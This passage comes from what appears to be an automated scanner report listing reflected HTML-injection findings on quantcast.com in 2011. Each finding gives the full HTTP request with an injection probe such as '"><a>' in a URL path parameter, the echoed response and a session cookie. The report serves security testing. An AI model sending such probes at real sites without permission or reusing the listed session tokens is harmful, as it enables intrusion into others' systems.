Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|18|NOTSET; JSESSIONID=B22F684E012112E464FC1C30D1B6F013

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B101EB2DE76C582745B637A457E3DC1F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> hulu.com8b375<a>5529af5d66b</em>
...[SNIP]...

1.128. http://www.quantcast.com/hulu.com [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/hulu.com

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad4b1"><a>52e204028ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hulu.comad4b1"><a>52e204028ad?country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1?r=19
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|18|NOTSET; JSESSIONID=B22F684E012112E464FC1C30D1B6F013

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A1BD96951F0EBE455A298AD331A1C43D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" hulu.comad4b1"><a>52e204028ad" />
...[SNIP]...

1.129. http://www.quantcast.com/profile/demographicGraphAll [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/demographicGraphAll

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64db7"><a>0e02c15b071 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile64db7"><a>0e02c15b071/demographicGraphAll?wunit=wd%3Acom.hulu&cols=2&pipe=V3&country=US&v=-1684061772 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|19|NOTSET; JSESSIONID=BAB8858A40256CEFC22DF912A7481AAC

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F5F95C1CB018E4B0115F59EB57343D1D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile64db7"><a>0e02c15b071 demographicGraphAll" />
...[SNIP]...

1.130. http://www.quantcast.com/profile/demographicGraphAll [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/demographicGraphAll

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 595bd<a>e84a40c5840 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile595bd<a>e84a40c5840/demographicGraphAll?wunit=wd%3Acom.hulu&cols=2&pipe=V3&country=US&v=-1684061772 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|19|NOTSET; JSESSIONID=BAB8858A40256CEFC22DF912A7481AAC

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=74D4501582F9AF59DF1859510377A70E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> profile595bd<a>e84a40c5840 demographicGraphAll</em>
...[SNIP]...

1.131. http://www.quantcast.com/profile/demographicGraphAll [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/demographicGraphAll

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ba33"><a>9726b5afc67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile/demographicGraphAll2ba33"><a>9726b5afc67?wunit=wd%3Acom.hulu&cols=2&pipe=V3&country=US&v=-1684061772 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; qcVisitor=2|77|1296918427290|19|NOTSET; JSESSIONID=BAB8858A40256CEFC22DF912A7481AAC

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile demographicGraphAll2ba33"><a>9726b5afc67" />
...[SNIP]...

1.132. http://www.quantcast.com/profile/performance [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/performance

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4829a"><a>f8333bd6d6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /profile4829a"><a>f8333bd6d6c/performance HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Origin: http://www.quantcast.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.1.10.1297448142; qcVisitor=2|77|1296918427290|15|NOTSET; JSESSIONID=3F6D98FAA44E28DAD1DA690E50F518DB
Content-Length: 32

time=5663&path=%2Fcraigslist.org

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=53004949B1408C31CEA3CFCA621A1DED; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile4829a"><a>f8333bd6d6c performance" />
...[SNIP]...

1.133. http://www.quantcast.com/profile/performance [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/performance

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4862"><a>9252cd30713 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /profile/performancee4862"><a>9252cd30713 HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Origin: http://www.quantcast.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.1.10.1297448142; qcVisitor=2|77|1296918427290|15|NOTSET; JSESSIONID=3F6D98FAA44E28DAD1DA690E50F518DB
Content-Length: 32

time=5663&path=%2Fcraigslist.org

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile performancee4862"><a>9252cd30713" />
...[SNIP]...

1.134. http://www.quantcast.com/profile/pieGraph [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/pieGraph

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f61e1<a>cd802b507e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profilef61e1<a>cd802b507e7/pieGraph?wunit=wd%3Acom.hulu&v=-1248383203&country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; JSESSIONID=AE0851A503ED26B36FB0334558696A93; qcVisitor=2|77|1296918427290|20|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AB0CE112506BC3F5A726002BA4F0B069; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> profilef61e1<a>cd802b507e7 pieGraph</em>
...[SNIP]...

1.135. http://www.quantcast.com/profile/pieGraph [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/pieGraph

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18a90"><a>4d722bffe93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile18a90"><a>4d722bffe93/pieGraph?wunit=wd%3Acom.hulu&v=-1248383203&country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; JSESSIONID=AE0851A503ED26B36FB0334558696A93; qcVisitor=2|77|1296918427290|20|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=363EFAFDFDFF820A0229365603B48AC5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:16:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile18a90"><a>4d722bffe93 pieGraph" />
...[SNIP]...

1.136. http://www.quantcast.com/profile/pieGraph [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/pieGraph

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e90"><a>add16f4f1ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile/pieGraph85e90"><a>add16f4f1ba?wunit=wd%3Acom.hulu&v=-1248383203&country=US HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/hulu.com?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.6.6.1297448147644; qcPageID=0; JSESSIONID=AE0851A503ED26B36FB0334558696A93; qcVisitor=2|77|1296918427290|20|NOTSET

Response

1.137. http://www.quantcast.com/profile/profileSummarySplit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/profileSummarySplit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f8f0"><a>2600d0e6880 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile3f8f0"><a>2600d0e6880/profileSummarySplit?wunit=wd%3Aorg.craigslist HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; qcVisitor=2|77|1296918427290|14|NOTSET; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4DF47EAE1888DFEF497E50DE35ED7316; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile3f8f0"><a>2600d0e6880 profileSummarySplit" />
...[SNIP]...

1.138. http://www.quantcast.com/profile/profileSummarySplit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/profileSummarySplit

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 49573<a>052abb688b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile49573<a>052abb688b8/profileSummarySplit?wunit=wd%3Aorg.craigslist HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; qcVisitor=2|77|1296918427290|14|NOTSET; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F6776D40FFB9F12321FE86BFF72FD1AD; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> profile49573<a>052abb688b8 profileSummarySplit</em>
...[SNIP]...

1.139. http://www.quantcast.com/profile/profileSummarySplit [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/profileSummarySplit

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fbe"><a>053d69822fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profile/profileSummarySplitf1fbe"><a>053d69822fc?wunit=wd%3Aorg.craigslist HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; qcVisitor=2|77|1296918427290|14|NOTSET; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profile profileSummarySplitf1fbe"><a>053d69822fc" />
...[SNIP]...

1.140. http://www.quantcast.com/profile/social [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/social

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d905e"><a>fe3adb8ea80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /profiled905e"><a>fe3adb8ea80/social?wunit=wd%3Aorg.craigslist HTTP/1.1
Host: www.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=14861494.2106100296.1296313950.1297445284.1297448142.5; __utmc=14861494; __utmb=14861494.1.10.1297448142; qcVisitor=2|77|1296918427290|15|NOTSET; JSESSIONID=3F6D98FAA44E28DAD1DA690E50F518DB

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E69337D780F190E4326D2812D9C2BC7B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" profiled905e"><a>fe3adb8ea80 social" />
...[SNIP]...

1.141. http://www.quantcast.com/profile/social [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.quantcast.com
Path:	/profile/social

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ffda"><a>3b68946047a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

